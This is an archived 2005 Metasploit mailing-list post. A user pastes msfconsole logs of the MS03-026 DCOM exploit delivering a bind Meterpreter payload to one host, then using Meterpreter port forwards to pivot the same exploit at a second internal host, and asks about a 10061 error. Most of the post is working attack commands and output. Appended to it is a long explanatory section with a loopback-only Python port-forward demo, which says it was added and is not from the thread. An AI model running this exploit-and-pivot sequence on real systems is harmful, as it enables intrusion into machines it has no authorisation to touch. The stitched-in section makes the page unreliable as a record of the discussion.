Metasploit mailing list archives
use of meterpreter (copy for the list )
From: thomas.werth at vahle.de (Thomas Werth)
Date: Mon, 18 Apr 2005 10:07:48 +0200
Does the bind handler ever say it established the connection? Does it say this before or after the 'Connected to REMACT'? If it says that the bind handler has established the connection before the 'REMACT' line then you may have created the port forward too soon. Can you include the full output from the exploit command?
The bind handler doesn't say it establishes a connection. I just saw that in the meterpreter window an error is thrown up: open_tcp_channel: failure, 10061. I'll attach the full log of what I did. Just as a note: after

meterpreter> portfwd -v
Local port forward listeners:
127.0.0.1:9000 <-> 10.10.10.77:135
127.0.0.1:4444 <-> 10.10.10.77:4444
meterpreter>

I start a second window, and when hitting "exploit" in the second window the error msg comes in window 1. Here's the log:

"Window 1"

vpc189:/usr/local/security/exploits/framework-2.3 # ./msfconsole
_ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___) |_|
+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > show options

Exploit Options
===============

  Exploit:    Name    Default    Description
  --------    ------  -------    ------------------
  required    RHOST              The target address
  required    RPORT   135        The target port

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.88
RHOST -> 10.10.10.88
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

  Exploit:    Name    Default      Description
  --------    ------  -----------  ------------------
  required    RHOST   10.10.10.88  The target address
  required    RPORT   135          The target port

  Payload:    Name      Default                                                                  Description
  --------    --------  -----------------------------------------------------------------------  ------------------------------------------
  required    EXITFUNC  thread                                                                   Exit technique: "process", "thread", "seh"
  required    METDLL    /usr/local/security/exploits/framework-2.3/data/meterpreter/metsrv.dll   The full path the meterpreter server dll
  required    LPORT     4444                                                                     Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x9a3c
[*] Got connection from 10.10.10.189:32784 <-> 10.10.10.88:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]
meterpreter> use -m Net
loadlib: Loading library from 'ext212326.dll' on the remote machine.
meterpreter> loadlib: success.
meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 10.10.10.77 -p 135
portfwd: Successfully created local listener on port 9000.
meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444
portfwd: Successfully created local listener on port 4444.
meterpreter> portfwd -v
Local port forward listeners:
127.0.0.1:9000 <-> 10.10.10.77:135
127.0.0.1:4444 <-> 10.10.10.77:4444
meterpreter> open_tcp_channel: failure, 10061.
meterpreter>

-------------------------------------------------------

"Window 2"

vpc189:/usr/local/security/exploits/framework-2.3 # ./msfconsole
| | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _|
+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
win32_bind  win32_bind_meterpreter  win32_bind_stg_upexec  win32_bind_dllinject  win32_bind_stg  win32_bind_vncinject
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name    Default    Description
  --------    ------  -------    ------------------
  required    RHOST              The target address
  required    RPORT   135        The target port

  Payload:    Name      Default   Description
  --------    --------  -------   ------------------------------------------
  required    EXITFUNC  thread    Exit technique: "process", "thread", "seh"
  required    LPORT     4444      Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 9000
RPORT -> 9000
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Got connection from 127.0.0.1:32786 <-> 127.0.0.1:4444
[*] Exiting Bind Handler.
msf msrpc_dcom_ms03_026(win32_bind) >

---------------------------------------------

I'm getting the same error when delaying creation of the portfwd to right after "Connected to REMACT with group ID 0xecd7". Here's a second log of window 2:

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0xecd6
[*] Exiting Bind Handler.
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0xecd7
[*] Got connection from 127.0.0.1:32814 <-> 127.0.0.1:4444
[*] Exiting Bind Handler.
msf msrpc_dcom_ms03_026(win32_bind) >

First I tried without the portfwd of port 4444; second I pushed it in right after the connect msg. Here's the according log from window 1:

meterpreter> portfwd -r -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444
portfwd: Successfully destroyed local listener on port 4444.
meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444
portfwd: Successfully created local listener on port 4444.
meterpreter> open_tcp_channel: failure, 10061.
meterpreter>

Hope this will help you to help me :D
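The log above shows the pattern worth recognising when reading any local port-forward output: window 2 reports "Got connection from 127.0.0.1:32786 <-> 127.0.0.1:4444" because the forward listener on the local side accepted the connection, and only afterwards does the relay try to reach the far side, where it is refused (Winsock 10061 is WSAECONNREFUSED: nothing was listening on the forwarded port at that moment). A local "connected" line is therefore not evidence that the forwarded target was reachable; the refusal surfaces on the relay side, and the local client just sees an immediate EOF. The following illustration, added here and not code from the thread or from Metasploit, is a minimal TCP forward listener in Python with the same accept-then-connect ordering. It runs entirely on loopback with a constructed echo server and a constructed closed port, and records the far-side errno so the two outcomes can be compared; the class and function names are assumptions for this example.

```python
import errno
import socket
import threading

# Winsock's "connection refused" code, the 10061 seen in the thread. POSIX reports the
# same condition as errno.ECONNREFUSED; both are treated as "far side refused" below.
WSAECONNREFUSED = 10061


def _pump(src, dst):
    """Copy bytes from src to dst until EOF, then tear both sockets down."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass
            s.close()


class LocalForward:
    """Accept on (lhost, lport); for each client, connect to (rhost, rport) and relay.

    The local accept completes before the far-side connect is attempted, which is why
    a local tool prints "connected" even when the forward target is unreachable.
    """

    def __init__(self, lhost, lport, rhost, rport):
        self.rhost, self.rport = rhost, rport
        self.refused = []  # errno of every far-side failure, kept for diagnosis
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((lhost, lport))
        self.sock.listen(5)
        self.sock.settimeout(0.2)  # lets the accept loop notice stop()
        self.port = self.sock.getsockname()[1]  # actual port when lport was 0
        self._running = False
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._running = True
        self._thread.start()

    def stop(self):
        self._running = False
        self.sock.close()
        self._thread.join(timeout=2)

    def _serve(self):
        while self._running:
            try:
                client, _ = self.sock.accept()  # local side: "Got connection from 127.0.0.1"
            except socket.timeout:
                continue
            except OSError:
                break
            try:
                remote = socket.create_connection((self.rhost, self.rport), timeout=2)
            except OSError as e:
                # Far side refused (10061 on Windows, ECONNREFUSED on POSIX). The client
                # was already accepted, so all it observes is an immediate EOF.
                self.refused.append(e.errno)
                client.close()
                continue
            threading.Thread(target=_pump, args=(client, remote), daemon=True).start()
            threading.Thread(target=_pump, args=(remote, client), daemon=True).start()


def is_refused(err):
    """True for either platform's 'connection refused' code."""
    return err in (errno.ECONNREFUSED, WSAECONNREFUSED)


def demo():
    """Forward to a live echo server, then to a closed port; report what each side saw."""
    # Constructed far side 1: a one-shot echo server on an ephemeral loopback port.
    echo = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    echo.bind(("127.0.0.1", 0))
    echo.listen(1)
    echo_port = echo.getsockname()[1]

    def echo_once():
        conn, _ = echo.accept()
        with conn:
            conn.sendall(conn.recv(4096))
        echo.close()

    threading.Thread(target=echo_once, daemon=True).start()

    fwd = LocalForward("127.0.0.1", 0, "127.0.0.1", echo_port)
    fwd.start()
    with socket.create_connection(("127.0.0.1", fwd.port), timeout=2) as c:
        c.sendall(b"ping")
        reply = c.recv(4096)
    fwd.stop()

    # Constructed far side 2: a port nothing listens on (bind to 0, note it, release it).
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()

    fwd2 = LocalForward("127.0.0.1", 0, "127.0.0.1", closed_port)
    fwd2.start()
    with socket.create_connection(("127.0.0.1", fwd2.port), timeout=2) as c:
        got = c.recv(4096)  # accepted locally, then closed once the far side refused
    fwd2.stop()

    return {
        "echo_reply": reply,
        "client_saw_eof": got == b"",
        "far_side_refused": bool(fwd2.refused) and is_refused(fwd2.refused[0]),
    }


if __name__ == "__main__":
    print(demo())
```

The second half of demo() reproduces the thread's symptom on a single host: the client's connect succeeds, exactly like the "Got connection" line in window 2, while the relay is the only place the refusal is visible. When triaging forward failures, read the error on the relay side rather than trusting the local handler's connection message.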
Current thread:
- use of meterpreter Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 15)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 19)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 20)